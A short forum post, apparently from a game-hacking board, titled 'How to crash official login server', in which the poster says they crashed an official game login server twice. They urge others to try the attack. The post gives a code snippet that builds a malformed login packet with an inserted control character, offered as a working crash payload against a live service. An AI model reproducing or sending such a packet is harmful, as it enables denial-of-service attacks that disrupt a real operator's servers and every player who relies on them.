How to crash official login server

08/23/2018 15:20 lika85#1
I think I have figured out a way how to crash login server. Already did 2 times on CZ, hope I won't get IP banned :D. Try to send this, see what happens.
Code:
loginPacket = "NoS0575 " + Crypto.encrypt(password).toUpperCase() 
+ " NONE_SESSION_ID 0080B9C9";
loginPacket+=" d26caa6d-70c5-44af-a06e-f4cf05134fd6 0043C7F9";
loginPacket += (char) (11);
loginPacket += version.version + " 0 " + (Crypto.md5(version.hash.toUpperCase() + name).toUpperCase());